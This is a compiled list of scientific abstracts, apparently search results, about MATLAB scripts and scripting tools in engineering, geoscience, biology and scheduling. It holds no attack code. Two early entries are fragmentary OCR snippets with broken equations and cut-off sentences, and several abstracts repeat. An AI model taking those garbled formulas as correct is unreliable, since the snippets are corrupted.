A System Analysis Approach to Robot Gripper Control Using Phase Lag Compensator Bode Designs
NASA Astrophysics Data System (ADS)
Aye, Khin Muyar; Lin, Htin; Tun, Hla Myo
2008-10-01
In this paper, we introduce the result comparisons that were developed for the phase lag compensator design using Bode Plots. The implementation of classical experiments as MATLAB m-files is described. Robot gripper control system can be designed to gain insight into a variety of concepts, including stabilization of unstable systems, compensation properties, Bode analysis and design. The analysis has resulted in a number of important conclusions for the design of a new generation of control support systems.
2010-06-01
8217 an? Now, since a - I IfM ( M an ’ - an< -=< f M (ni) it can be written as s = 2(ti - ai) f (n.’) This equation can be expressed in matrix form as SM...Propagate the sensitivities backward through the network: s = -2FM(nM) (t - a ) , SM = FM (0) (Wm+1)TSm+1, form = M - 1, ... , 2, 1. 3. Weights and biases... A MATLAB M -Files
2006-09-01
spiral development cycle involved transporting the software processes from a Windows XP / MATLAB environment to a Linux / C++ environment. This...tested on. Additionally, in the case of the GUMSTIX PC boards, the LINUX operating system is burned into the read-only memory. Lastly, both PC-104 and...both the real-time environment and the post-processed en - vironment. When the system operates in real-time mode, an output file is generated which
Lowering the Barrier to Reproducible Research by Publishing Provenance from Common Analytical Tools
NASA Astrophysics Data System (ADS)
Jones, M. B.; Slaughter, P.; Walker, L.; Jones, C. S.; Missier, P.; Ludäscher, B.; Cao, Y.; McPhillips, T.; Schildhauer, M.
2015-12-01
Scientific provenance describes the authenticity, origin, and processing history of research products and promotes scientific transparency by detailing the steps in computational workflows that produce derived products. These products include papers, findings, input data, software products to perform computations, and derived data and visualizations. The geosciences community values this type of information, and, at least theoretically, strives to base conclusions on computationally replicable findings. In practice, capturing detailed provenance is laborious and thus has been a low priority; beyond a lab notebook describing methods and results, few researchers capture and preserve detailed records of scientific provenance. We have built tools for capturing and publishing provenance that integrate into analytical environments that are in widespread use by geoscientists (R and Matlab). These tools lower the barrier to provenance generation by automating capture of critical information as researchers prepare data for analysis, develop, test, and execute models, and create visualizations. The 'recordr' library in R and the `matlab-dataone` library in Matlab provide shared functions to capture provenance with minimal changes to normal working procedures. Researchers can capture both scripted and interactive sessions, tag and manage these executions as they iterate over analyses, and then prune and publish provenance metadata and derived products to the DataONE federation of archival repositories. Provenance traces conform to the ProvONE model extension of W3C PROV, enabling interoperability across tools and languages. The capture system supports fine-grained versioning of science products and provenance traces. By assigning global identifiers such as DOIs, reseachers can cite the computational processes used to reach findings. And, finally, DataONE has built a web portal to search, browse, and clearly display provenance relationships between input data, the software used to execute analyses and models, and derived data and products that arise from these computations. This provenance is vital to interpretation and understanding of science, and provides an audit trail that researchers can use to understand and replicate computational workflows in the geosciences.
NASA Technical Reports Server (NTRS)
Elrod, David; Christensen, Eric; Brown, Andrew
2011-01-01
The temporal frequency content of the dynamic pressure predicted by a 360 degree computational fluid dynamics (CFD) analysis of a turbine flow field provides indicators of forcing function excitation frequencies (e.g., multiples of blade pass frequency) for turbine components. For the Pratt and Whitney Rocketdyne J-2X engine turbopumps, Campbell diagrams generated using these forcing function frequencies and the results of NASTRAN modal analyses show a number of components with modes in the engine operating range. As a consequence, forced response and static analyses are required for the prediction of combined stress, high cycle fatigue safety factors (HCFSF). Cyclically symmetric structural models have been used to analyze turbine vane and blade rows, not only in modal analyses, but also in forced response and static analyses. Due to the tortuous flow pattern in the turbine, dynamic pressure loading is not cyclically symmetric. Furthermore, CFD analyses predict dynamic pressure waves caused by adjacent and non-adjacent blade/vane rows upstream and downstream of the row analyzed. A MATLAB script has been written to calculate displacements due to the complex cyclically asymmetric dynamic pressure components predicted by CFD analysis, for all grids in a blade/vane row, at a chosen turbopump running speed. The MATLAB displacements are then read into NASTRAN, and dynamic stresses are calculated, including an adjustment for possible mistuning. In a cyclically symmetric NASTRAN static analysis, static stresses due to centrifugal, thermal, and pressure loading at the mode running speed are calculated. MATLAB is used to generate the HCFSF at each grid in the blade/vane row. When compared to an approach assuming cyclic symmetry in the dynamic flow field, the current approach provides better assurance that the worst case safety factor has been identified. An extended example for a J-2X turbopump component is provided.
EAGLE: 'EAGLE'Is an' Algorithmic Graph Library for Exploration
DOE Office of Scientific and Technical Information (OSTI.GOV)
2015-01-16
The Resource Description Framework (RDF) and SPARQL Protocol and RDF Query Language (SPARQL) were introduced about a decade ago to enable flexible schema-free data interchange on the Semantic Web. Today data scientists use the framework as a scalable graph representation for integrating, querying, exploring and analyzing data sets hosted at different sources. With increasing adoption, the need for graph mining capabilities for the Semantic Web has emerged. Today there is no tools to conduct "graph mining" on RDF standard data sets. We address that need through implementation of popular iterative Graph Mining algorithms (Triangle count, Connected component analysis, degree distribution,more » diversity degree, PageRank, etc.). We implement these algorithms as SPARQL queries, wrapped within Python scripts and call our software tool as EAGLE. In RDF style, EAGLE stands for "EAGLE 'Is an' algorithmic graph library for exploration. EAGLE is like 'MATLAB' for 'Linked Data.'« less
Shi, Handuo; Colavin, Alexandre; Lee, Timothy K; Huang, Kerwyn Casey
2017-02-01
Single-cell microscopy is a powerful tool for studying gene functions using strain libraries, but it suffers from throughput limitations. Here we describe the Strain Library Imaging Protocol (SLIP), which is a high-throughput, automated microscopy workflow for large strain collections that requires minimal user involvement. SLIP involves transferring arrayed bacterial cultures from multiwell plates onto large agar pads using inexpensive replicator pins and automatically imaging the resulting single cells. The acquired images are subsequently reviewed and analyzed by custom MATLAB scripts that segment single-cell contours and extract quantitative metrics. SLIP yields rich data sets on cell morphology and gene expression that illustrate the function of certain genes and the connections among strains in a library. For a library arrayed on 96-well plates, image acquisition can be completed within 4 min per plate.
Battaglia, Maurizio; ,; Peter, F.; Murray, Jessica R.
2013-01-01
This manual provides the physical and mathematical concepts for selected models used to interpret deformation measurements near active faults and volcanic centers. The emphasis is on analytical models of deformation that can be compared with data from the Global Positioning System (GPS) receivers, Interferometric synthetic aperture radar (InSAR), leveling surveys, tiltmeters and strainmeters. Source models include pressurized spherical, ellipsoidal, and horizontal penny-shaped geometries in an elastic, homogeneous, flat half-space. Vertical dikes and faults are described following the mathematical notation for rectangular dislocations in an elastic, homogeneous, flat half-space. All the analytical expressions were verified against numerical models developed by use of COMSOL Multyphics, a Finite Element Analysis software (http://www.comsol.com). In this way, typographical errors present were identified and corrected. Matlab scripts are also provided to facilitate the application of these models.
An Efficient, Noniterative Method of Identifying the Cost-Effectiveness Frontier.
Suen, Sze-chuan; Goldhaber-Fiebert, Jeremy D
2016-01-01
Cost-effectiveness analysis aims to identify treatments and policies that maximize benefits subject to resource constraints. However, the conventional process of identifying the efficient frontier (i.e., the set of potentially cost-effective options) can be algorithmically inefficient, especially when considering a policy problem with many alternative options or when performing an extensive suite of sensitivity analyses for which the efficient frontier must be found for each. Here, we describe an alternative one-pass algorithm that is conceptually simple, easier to implement, and potentially faster for situations that challenge the conventional approach. Our algorithm accomplishes this by exploiting the relationship between the net monetary benefit and the cost-effectiveness plane. To facilitate further evaluation and use of this approach, we also provide scripts in R and Matlab that implement our method and can be used to identify efficient frontiers for any decision problem. © The Author(s) 2015.
An Efficient, Non-iterative Method of Identifying the Cost-Effectiveness Frontier
Suen, Sze-chuan; Goldhaber-Fiebert, Jeremy D.
2015-01-01
Cost-effectiveness analysis aims to identify treatments and policies that maximize benefits subject to resource constraints. However, the conventional process of identifying the efficient frontier (i.e., the set of potentially cost-effective options) can be algorithmically inefficient, especially when considering a policy problem with many alternative options or when performing an extensive suite of sensitivity analyses for which the efficient frontier must be found for each. Here, we describe an alternative one-pass algorithm that is conceptually simple, easier to implement, and potentially faster for situations that challenge the conventional approach. Our algorithm accomplishes this by exploiting the relationship between the net monetary benefit and the cost-effectiveness plane. To facilitate further evaluation and use of this approach, we additionally provide scripts in R and Matlab that implement our method and can be used to identify efficient frontiers for any decision problem. PMID:25926282
Analysis of interference of QPSK and QDPSK modulation signals by mathematical
NASA Astrophysics Data System (ADS)
Li, Dairuo; Xu, Kai
2017-03-01
In today's society, with the rapid development and extensive application of the information technology of the network central station and the integrated information system technology, information plays an important role in the military communication, mastering the information right to the competition Important role, how to protect one's own security, smooth access to and transmission of information, and to maximize the elimination of interference has become an important issue at home and abroad. QPSK modulation and its improved QPSK modulation as the mainstream signal modulation, the most widely used. In this paper, the principle of QPSK and QDPSK modulation and demodulation are introduced in this paper. Then, how to interfere with QPSK modulation signal is analyzed, and the interference of QPSK modulation signal is simulated by Matlab scripting program, which can be used in the next step. And to study the next step of anti-jamming measures provided the basis and preparatory work.
Biomechanical ToolKit: Open-source framework to visualize and process biomechanical data.
Barre, Arnaud; Armand, Stéphane
2014-04-01
C3D file format is widely used in the biomechanical field by companies and laboratories to store motion capture systems data. However, few software packages can visualize and modify the integrality of the data in the C3D file. Our objective was to develop an open-source and multi-platform framework to read, write, modify and visualize data from any motion analysis systems using standard (C3D) and proprietary file formats (used by many companies producing motion capture systems). The Biomechanical ToolKit (BTK) was developed to provide cost-effective and efficient tools for the biomechanical community to easily deal with motion analysis data. A large panel of operations is available to read, modify and process data through C++ API, bindings for high-level languages (Matlab, Octave, and Python), and standalone application (Mokka). All these tools are open-source and cross-platform and run on all major operating systems (Windows, Linux, MacOS X). Copyright © 2014 Elsevier Ireland Ltd. All rights reserved.
Java Application Shell: A Framework for Piecing Together Java Applications
NASA Technical Reports Server (NTRS)
Miller, Philip; Powers, Edward I. (Technical Monitor)
2001-01-01
This session describes the architecture of Java Application Shell (JAS), a Swing-based framework for developing interactive Java applications. Java Application Shell is being developed by Commerce One, Inc. for NASA Goddard Space Flight Center Code 588. The purpose of JAS is to provide a framework for the development of Java applications, providing features that enable the development process to be more efficient, consistent and flexible. Fundamentally, JAS is based upon an architecture where an application is considered a collection of 'plugins'. In turn, a plug-in is a collection of Swing actions defined using XML and packaged in a jar file. Plug-ins may be local to the host platform or remotely-accessible through HTTP. Local and remote plugins are automatically discovered by JAS upon application startup; plugins may also be loaded dynamically without having to re-start the application. Using Extensible Markup Language (XML) to define actions, as opposed to hardcoding them in application logic, allows easier customization of application-specific operations by separating application logic from presentation. Through XML, a developer defines an action that may appear on any number of menus, toolbars, and buttons. Actions maintain and propagate enable/disable states and specify icons, tool-tips, titles, etc. Furthermore, JAS allows actions to be implemented using various scripting languages through the use of IBM's Bean Scripting Framework. Scripted action implementation is seamless to the end-user. In addition to action implementation, scripts may be used for application and unit-level testing. In the case of application-level testing, JAS has hooks to assist a script in simulating end-user input. JAS also provides property and user preference management, JavaHelp, Undo/Redo, Multi-Document Interface, Single-Document Interface, printing, and logging. Finally, Jini technology has also been included into the framework by means of a Jini services browser and the ability to associate services with actions. Several Java technologies have been incorporated into JAS, including Swing, Internal Frames, Java Beans, XML, JavaScript, JavaHelp, and Jini. Additional information is contained in the original extended abstract.
NASA Technical Reports Server (NTRS)
Ensey, Tyler S.
2013-01-01
During my internship at NASA, I was a model developer for Ground Support Equipment (GSE). The purpose of a model developer is to develop and unit test model component libraries (fluid, electrical, gas, etc.). The models are designed to simulate software for GSE (Ground Special Power, Crew Access Arm, Cryo, Fire and Leak Detection System, Environmental Control System (ECS), etc. .) before they are implemented into hardware. These models support verifying local control and remote software for End-Item Software Under Test (SUT). The model simulates the physical behavior (function, state, limits and 110) of each end-item and it's dependencies as defined in the Subsystem Interface Table, Software Requirements & Design Specification (SRDS), Ground Integrated Schematic (GIS), and System Mechanical Schematic.(SMS). The software of each specific model component is simulated through MATLAB's Simulink program. The intensiv model development life cycle is a.s follows: Identify source documents; identify model scope; update schedule; preliminary design review; develop model requirements; update model.. scope; update schedule; detailed design review; create/modify library component; implement library components reference; implement subsystem components; develop a test script; run the test script; develop users guide; send model out for peer review; the model is sent out for verifictionlvalidation; if there is empirical data, a validation data package is generated; if there is not empirical data, a verification package is generated; the test results are then reviewed; and finally, the user. requests accreditation, and a statement of accreditation is prepared. Once each component model is reviewed and approved, they are intertwined together into one integrated model. This integrated model is then tested itself, through a test script and autotest, so that it can be concluded that all models work conjointly, for a single purpose. The component I was assigned, specifically, was a fluid component, a discrete pressure switch. The switch takes a fluid pressure input, and if the pressure is greater than a designated cutoff pressure, the switch would stop fluid flow.
Simple, Script-Based Science Processing Archive
NASA Technical Reports Server (NTRS)
Lynnes, Christopher; Hegde, Mahabaleshwara; Barth, C. Wrandle
2007-01-01
The Simple, Scalable, Script-based Science Processing (S4P) Archive (S4PA) is a disk-based archival system for remote sensing data. It is based on the data-driven framework of S4P and is used for data transfer, data preprocessing, metadata generation, data archive, and data distribution. New data are automatically detected by the system. S4P provides services such as data access control, data subscription, metadata publication, data replication, and data recovery. It comprises scripts that control the data flow. The system detects the availability of data on an FTP (file transfer protocol) server, initiates data transfer, preprocesses data if necessary, and archives it on readily available disk drives with FTP and HTTP (Hypertext Transfer Protocol) access, allowing instantaneous data access. There are options for plug-ins for data preprocessing before storage. Publication of metadata to external applications such as the Earth Observing System Clearinghouse (ECHO) is also supported. S4PA includes a graphical user interface for monitoring the system operation and a tool for deploying the system. To ensure reliability, S4P continuously checks stored data for integrity, Further reliability is provided by tape backups of disks made once a disk partition is full and closed. The system is designed for low maintenance, requiring minimal operator oversight.
Observing proposals on the Web at the National Optical Astronomy Observatories
NASA Astrophysics Data System (ADS)
Pilachowski, Catherine A.; Barnes, Jeannette; Bell, David J.
1998-07-01
Proposals for telescope time at facilities available through the National Optical Astronomy Observatories can now be prepared and submitted via the WWW. Investigators submit proposal information through a series of HTML forms to the NOAO server, where the information is processed by Perl CGI scripts. PostScript figures and ASCII files may be attached by investigators for inclusion in their proposals using their browser's upload feature. Proposal information is saved on the server so that investigators can return in later sessions to continue work on a proposal and so that collaborators can participate in writing the proposal if they have access to the proposal account name and password. The system provides on-line verification of LATEX syntax and a spellchecker, and confirms that all sections of the proposal are filled out. Users can request a LATEX or PostScript copy of their proposal by e-mail, or view the proposal on line. The advantages of the Web-based process for our users are convenience, access to on-line documentation, and the simple interface which avoids direct confrontation with LATEX. From the NOAO point of view, the advantage is the use of standardized formats and syntax, particularly as we begin to receive proposals for the Gemini telescopes and some independent observatories.
NASA Astrophysics Data System (ADS)
Moreno, R.; Bazán, A. M.
2017-10-01
The main purpose of this work is to study improvements to the learning method of technical drawing and descriptive geometry through exercises with traditional techniques that are usually solved manually by applying automated processes assisted by high-level CAD templates (HLCts). Given that an exercise with traditional procedures can be solved, detailed step by step in technical drawing and descriptive geometry manuals, CAD applications allow us to do the same and generalize it later, incorporating references. Traditional teachings have become obsolete and current curricula have been relegated. However, they can be applied in certain automation processes. The use of geometric references (using variables in script languages) and their incorporation into HLCts allows the automation of drawing processes. Instead of repeatedly creating similar exercises or modifying data in the same exercises, users should be able to use HLCts to generate future modifications of these exercises. This paper introduces the automation process when generating exercises based on CAD script files, aided by parametric geometry calculation tools. The proposed method allows us to design new exercises without user intervention. The integration of CAD, mathematics, and descriptive geometry facilitates their joint learning. Automation in the generation of exercises not only saves time but also increases the quality of the statements and reduces the possibility of human error.
NASA Astrophysics Data System (ADS)
France, Lydéric; Nicollet, Christian
2010-06-01
MetaRep is a program based on our earlier program CMAS 3D. It is developed in MATLAB ® script. MetaRep objectives are to visualize and project major element compositions of mafic and pelitic rocks and their minerals in the pseudo-quaternary projections of the ACF-S, ACF-N, CMAS, AFM-K, AFM-S and AKF-S systems. These six systems are commonly used to describe metamorphic mineral assemblages and magmatic evolutions. Each system, made of four apices, can be represented in a tetrahedron that can be visualized in three dimensions with MetaRep; the four tetrahedron apices represent oxides or combination of oxides that define the composition of the projected rock or mineral. The three-dimensional representation allows one to obtain a better understanding of the topology of the relationships between the rocks and minerals and relations. From these systems, MetaRep can also project data in ternary plots (for example, the ACF, AFM and AKF ternary projections can be generated). A functional interface makes it easy to use and does not require any knowledge of MATLAB ® programming. To facilitate the use, MetaRep loads, from the main interface, data compiled in a Microsoft Excel ™ spreadsheet. Although useful for scientific research, the program is also a powerful tool for teaching. We propose an application example that, by using two combined systems (ACF-S and ACF-N), provides strong confirmation in the petrological interpretation.
MPBEC, a Matlab Program for Biomolecular Electrostatic Calculations
NASA Astrophysics Data System (ADS)
Vergara-Perez, Sandra; Marucho, Marcelo
2016-01-01
One of the most used and efficient approaches to compute electrostatic properties of biological systems is to numerically solve the Poisson-Boltzmann (PB) equation. There are several software packages available that solve the PB equation for molecules in aqueous electrolyte solutions. Most of these software packages are useful for scientists with specialized training and expertise in computational biophysics. However, the user is usually required to manually take several important choices, depending on the complexity of the biological system, to successfully obtain the numerical solution of the PB equation. This may become an obstacle for researchers, experimentalists, even students with no special training in computational methodologies. Aiming to overcome this limitation, in this article we present MPBEC, a free, cross-platform, open-source software that provides non-experts in the field an easy and efficient way to perform biomolecular electrostatic calculations on single processor computers. MPBEC is a Matlab script based on the Adaptative Poisson-Boltzmann Solver, one of the most popular approaches used to solve the PB equation. MPBEC does not require any user programming, text editing or extensive statistical skills, and comes with detailed user-guide documentation. As a unique feature, MPBEC includes a useful graphical user interface (GUI) application which helps and guides users to configure and setup the optimal parameters and approximations to successfully perform the required biomolecular electrostatic calculations. The GUI also incorporates visualization tools to facilitate users pre- and post-analysis of structural and electrical properties of biomolecules.
Aung, Hnin W.; Henry, Susan A.
2013-01-01
Abstract Genome-scale metabolic models are built using information from an organism's annotated genome and, correspondingly, information on reactions catalyzed by the set of metabolic enzymes encoded by the genome. These models have been successfully applied to guide metabolic engineering to increase production of metabolites of industrial interest. Congruity between simulated and experimental metabolic behavior is influenced by the accuracy of the representation of the metabolic network in the model. In the interest of applying the consensus model of Saccharomyces cerevisiae metabolism for increased productivity of triglycerides, we manually evaluated the representation of fatty acid, glycerophospholipid, and glycerolipid metabolism in the consensus model (Yeast v6.0). These areas of metabolism were chosen due to their tightly interconnected nature to triglyceride synthesis. Manual curation was facilitated by custom MATLAB functions that return information contained in the model for reactions associated with genes and metabolites within the stated areas of metabolism. Through manual curation, we have identified inconsistencies between information contained in the model and literature knowledge. These inconsistencies include incorrect gene-reaction associations, improper definition of substrates/products in reactions, inappropriate assignments of reaction directionality, nonfunctional β-oxidation pathways, and missing reactions relevant to the synthesis and degradation of triglycerides. Suggestions to amend these inconsistencies in the Yeast v6.0 model can be implemented through a MATLAB script provided in the Supplementary Materials, Supplementary Data S1 (Supplementary Data are available online at www.liebertpub.com/ind). PMID:24678285
MPBEC, a Matlab Program for Biomolecular Electrostatic Calculations
Vergara-Perez, Sandra; Marucho, Marcelo
2015-01-01
One of the most used and efficient approaches to compute electrostatic properties of biological systems is to numerically solve the Poisson-Boltzmann (PB) equation. There are several software packages available that solve the PB equation for molecules in aqueous electrolyte solutions. Most of these software packages are useful for scientists with specialized training and expertise in computational biophysics. However, the user is usually required to manually take several important choices, depending on the complexity of the biological system, to successfully obtain the numerical solution of the PB equation. This may become an obstacle for researchers, experimentalists, even students with no special training in computational methodologies. Aiming to overcome this limitation, in this article we present MPBEC, a free, cross-platform, open-source software that provides non-experts in the field an easy and efficient way to perform biomolecular electrostatic calculations on single processor computers. MPBEC is a Matlab script based on the Adaptative Poisson Boltzmann Solver, one of the most popular approaches used to solve the PB equation. MPBEC does not require any user programming, text editing or extensive statistical skills, and comes with detailed user-guide documentation. As a unique feature, MPBEC includes a useful graphical user interface (GUI) application which helps and guides users to configure and setup the optimal parameters and approximations to successfully perform the required biomolecular electrostatic calculations. The GUI also incorporates visualization tools to facilitate users pre- and post- analysis of structural and electrical properties of biomolecules. PMID:26924848
MPBEC, a Matlab Program for Biomolecular Electrostatic Calculations.
Vergara-Perez, Sandra; Marucho, Marcelo
2016-01-01
One of the most used and efficient approaches to compute electrostatic properties of biological systems is to numerically solve the Poisson-Boltzmann (PB) equation. There are several software packages available that solve the PB equation for molecules in aqueous electrolyte solutions. Most of these software packages are useful for scientists with specialized training and expertise in computational biophysics. However, the user is usually required to manually take several important choices, depending on the complexity of the biological system, to successfully obtain the numerical solution of the PB equation. This may become an obstacle for researchers, experimentalists, even students with no special training in computational methodologies. Aiming to overcome this limitation, in this article we present MPBEC, a free, cross-platform, open-source software that provides non-experts in the field an easy and efficient way to perform biomolecular electrostatic calculations on single processor computers. MPBEC is a Matlab script based on the Adaptative Poisson Boltzmann Solver, one of the most popular approaches used to solve the PB equation. MPBEC does not require any user programming, text editing or extensive statistical skills, and comes with detailed user-guide documentation. As a unique feature, MPBEC includes a useful graphical user interface (GUI) application which helps and guides users to configure and setup the optimal parameters and approximations to successfully perform the required biomolecular electrostatic calculations. The GUI also incorporates visualization tools to facilitate users pre- and post- analysis of structural and electrical properties of biomolecules.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Jones, K.R.; Fisher, J.E.
1997-03-01
ACE/gr is XY plotting tool for workstations or X-terminals using X. A few of its features are: User defined scaling, tick marks, labels, symbols, line styles, colors. Batch mode for unattended plotting. Read and write parameters used during a session. Polynomial regression, splines, running averages, DFT/FFT, cross/auto-correlation. Hardcopy support for PostScript, HP-GL, and FrameMaker.mif format. While ACE/gr has a convenient point-and-click interface, most parameter settings and operations are available through a command line interface (found in Files/Commands).
NASA Astrophysics Data System (ADS)
1998-03-01
All the Letters to the Editor in this issue are in the same PostScript or PDF file. Contents Comment on `Magnetic and electric field strengths of high voltage power lines and household appliances' José Luis Giordano Dept. de Ciencia y TecnologÃa de Materiales y Fluidos, CPSI, Universidad de Zaragoza, Spain Twins paradox S R Carson Norton College, Malton, North Yorkshire, UK On alternative ways of finding the ratio of specific heats of gases Tomas Ficker Physics Department, Technical University of Brno, Czech Republic
An open source Java web application to build self-contained Web GIS sites
NASA Astrophysics Data System (ADS)
Zavala Romero, O.; Ahmed, A.; Chassignet, E.; Zavala-Hidalgo, J.
2014-12-01
This work describes OWGIS, an open source Java web application that creates Web GIS sites by automatically writing HTML and JavaScript code. OWGIS is configured by XML files that define which layers (geographic datasets) will be displayed on the websites. This project uses several Open Geospatial Consortium standards to request data from typical map servers, such as GeoServer, and is also able to request data from ncWMS servers. The latter allows for the displaying of 4D data stored using the NetCDF file format (widely used for storing environmental model datasets). Some of the features available on the sites built with OWGIS are: multiple languages, animations, vertical profiles and vertical transects, color palettes, color ranges, and the ability to download data. OWGIS main users are scientists, such as oceanographers or climate scientists, who store their data in NetCDF files and want to analyze, visualize, share, or compare their data using a website.
Caryoscope: An Open Source Java application for viewing microarray data in a genomic context
Awad, Ihab AB; Rees, Christian A; Hernandez-Boussard, Tina; Ball, Catherine A; Sherlock, Gavin
2004-01-01
Background Microarray-based comparative genome hybridization experiments generate data that can be mapped onto the genome. These data are interpreted more easily when represented graphically in a genomic context. Results We have developed Caryoscope, which is an open source Java application for visualizing microarray data from array comparative genome hybridization experiments in a genomic context. Caryoscope can read General Feature Format files (GFF files), as well as comma- and tab-delimited files, that define the genomic positions of the microarray reporters for which data are obtained. The microarray data can be browsed using an interactive, zoomable interface, which helps users identify regions of chromosomal deletion or amplification. The graphical representation of the data can be exported in a number of graphic formats, including publication-quality formats such as PostScript. Conclusion Caryoscope is a useful tool that can aid in the visualization, exploration and interpretation of microarray data in a genomic context. PMID:15488149
Harrison, Arnell S.; Dadisman, Shawn V.; Reich, Christopher D.; Wiese, Dana S.; Greenwood, Jason W.; Swarzenski, Peter W.
2007-01-01
In September of 2006, the U.S. Geological Survey conducted geophysical surveys offshore of Fort Lauderdale, FL. This report serves as an archive of unprocessed digital boomer and CHIRP seismic reflection data, trackline maps, navigation files, GIS information, Field Activity Collection System (FACS) logs, observer's logbook, and formal FGDC metadata. Filtered and gained digital images of the seismic profiles are also provided. The archived trace data are in standard Society of Exploration Geophysicists (SEG) SEG-Y format (Barry and others, 1975) and may be downloaded and processed with commercial or public domain software such as Seismic Unix (SU). Example SU processing scripts and USGS software for viewing the SEG-Y files (Zihlman, 1992) are also provided.
Simulation Control Graphical User Interface Logging Report
NASA Technical Reports Server (NTRS)
Hewling, Karl B., Jr.
2012-01-01
One of the many tasks of my project was to revise the code of the Simulation Control Graphical User Interface (SIM GUI) to enable logging functionality to a file. I was also tasked with developing a script that directed the startup and initialization flow of the various LCS software components. This makes sure that a software component will not spin up until all the appropriate dependencies have been configured properly. Also I was able to assist hardware modelers in verifying the configuration of models after they have been upgraded to a new software version. I developed some code that analyzes the MDL files to determine if any error were generated due to the upgrade process. Another one of the projects assigned to me was supporting the End-to-End Hardware/Software Daily Tag-up meeting.
CT radiation profile width measurement using CR imaging plate raw data
Yang, Chang‐Ying Joseph
2015-01-01
This technical note demonstrates computed tomography (CT) radiation profile measurement using computed radiography (CR) imaging plate raw data showing it is possible to perform the CT collimation width measurement using a single scan without saturating the imaging plate. Previously described methods require careful adjustments to the CR reader settings in order to avoid signal clipping in the CR processed image. CT radiation profile measurements were taken as part of routine quality control on 14 CT scanners from four vendors. CR cassettes were placed on the CT scanner bed, raised to isocenter, and leveled. Axial scans were taken at all available collimations, advancing the cassette for each scan. The CR plates were processed and raw CR data were analyzed using MATLAB scripts to measure collimation widths. The raw data approach was compared with previously established methodology. The quality control analysis scripts are released as open source using creative commons licensing. A log‐linear relationship was found between raw pixel value and air kerma, and raw data collimation width measurements were in agreement with CR‐processed, bit‐reduced data, using previously described methodology. The raw data approach, with intrinsically wider dynamic range, allows improved measurement flexibility and precision. As a result, we demonstrate a methodology for CT collimation width measurements using a single CT scan and without the need for CR scanning parameter adjustments which is more convenient for routine quality control work. PACS numbers: 87.57.Q‐, 87.59.bd, 87.57.uq PMID:26699559
NASA Astrophysics Data System (ADS)
Asinari, Pietro
2010-10-01
The homogeneous isotropic Boltzmann equation (HIBE) is a fundamental dynamic model for many applications in thermodynamics, econophysics and sociodynamics. Despite recent hardware improvements, the solution of the Boltzmann equation remains extremely challenging from the computational point of view, in particular by deterministic methods (free of stochastic noise). This work aims to improve a deterministic direct method recently proposed [V.V. Aristov, Kluwer Academic Publishers, 2001] for solving the HIBE with a generic collisional kernel and, in particular, for taking care of the late dynamics of the relaxation towards the equilibrium. Essentially (a) the original problem is reformulated in terms of particle kinetic energy (exact particle number and energy conservation during microscopic collisions) and (b) the computation of the relaxation rates is improved by the DVM-like correction, where DVM stands for Discrete Velocity Model (ensuring that the macroscopic conservation laws are exactly satisfied). Both these corrections make possible to derive very accurate reference solutions for this test case. Moreover this work aims to distribute an open-source program (called HOMISBOLTZ), which can be redistributed and/or modified for dealing with different applications, under the terms of the GNU General Public License. The program has been purposely designed in order to be minimal, not only with regards to the reduced number of lines (less than 1000), but also with regards to the coding style (as simple as possible). Program summaryProgram title: HOMISBOLTZ Catalogue identifier: AEGN_v1_0 Program summary URL:http://cpc.cs.qub.ac.uk/summaries/AEGN_v1_0.html Program obtainable from: CPC Program Library, Queen's University, Belfast, N. Ireland Licensing provisions: GNU General Public License No. of lines in distributed program, including test data, etc.: 23 340 No. of bytes in distributed program, including test data, etc.: 7 635 236 Distribution format: tar.gz Programming language: Tested with Matlab version ⩽6.5. However, in principle, any recent version of Matlab or Octave should work Computer: All supporting Matlab or Octave Operating system: All supporting Matlab or Octave RAM: 300 MBytes Classification: 23 Nature of problem: The problem consists in integrating the homogeneous Boltzmann equation for a generic collisional kernel in case of isotropic symmetry, by a deterministic direct method. Difficulties arise from the multi-dimensionality of the collisional operator and from satisfying the conservation of particle number and energy (momentum is trivial for this test case) as accurately as possible, in order to preserve the late dynamics. Solution method: The solution is based on the method proposed by Aristov (2001) [1], but with two substantial improvements: (a) the original problem is reformulated in terms of particle kinetic energy (this allows one to ensure exact particle number and energy conservation during microscopic collisions) and (b) a DVM-like correction (where DVM stands for Discrete Velocity Model) is adopted for improving the relaxation rates (this allows one to satisfy exactly the conservation laws at macroscopic level, which is particularly important for describing the late dynamics in the relaxation towards the equilibrium). Both these corrections make possible to derive very accurate reference solutions for this test case. Restrictions: The nonlinear Boltzmann equation is extremely challenging from the computational point of view, in particular for deterministic methods, despite the increased computational power of recent hardware. In this work, only the homogeneous isotropic case is considered, for making possible the development of a minimal program (by a simple scripting language) and allowing the user to check the advantages of the proposed improvements beyond Aristov's (2001) method [1]. The initial conditions are supposed parameterized according to a fixed analytical expression, but this can be easily modified. Running time: From minutes to hours (depending on the adopted discretization of the kinetic energy space). For example, on a 64 bit workstation with Intel CoreTM i7-820Q Quad Core CPU at 1.73 GHz and 8 MBytes of RAM, the provided test run (with the corresponding binary data file storing the pre-computed relaxation rates) requires 154 seconds. References:V.V. Aristov, Direct Methods for Solving the Boltzmann Equation and Study of Nonequilibrium Flows, Kluwer Academic Publishers, 2001.
Tool for Merging Proposals Into DSN Schedules
NASA Technical Reports Server (NTRS)
Khanampornpan, Teerapat; Kwok, John; Call, Jared
2008-01-01
A Practical Extraction and Reporting Language (Perl) script called merge7da has been developed to facilitate determination, by a project scheduler in NASA's Deep Space Network, of whether a proposal for use of the DSN could create a conflict with the current DSN schedule. Prior to the development of merge7da, there was no way to quickly identify potential schedule conflicts: it was necessary to submit a proposal and wait a day or two for a response from a DSN scheduling facility. By using merge7da to detect and eliminate potential schedule conflicts before submitting a proposal, a project scheduler saves time and gains assurance that the proposal will probably be accepted. merge7da accepts two input files, one of which contains the current DSN schedule and is in a DSN-standard format called '7da'. The other input file contains the proposal and is in another DSN-standard format called 'C1/C2'. merge7da processes the two input files to produce a merged 7da-format output file that represents the DSN schedule as it would be if the proposal were to be adopted. This 7da output file can be loaded into various DSN scheduling software tools now in use.
Preliminary geologic map of the Big Bear City 7.5' Quadrangle, San Bernardino County, California
Miller, Fred K.; Cossette, Digital preparation by Pamela M.
2004-01-01
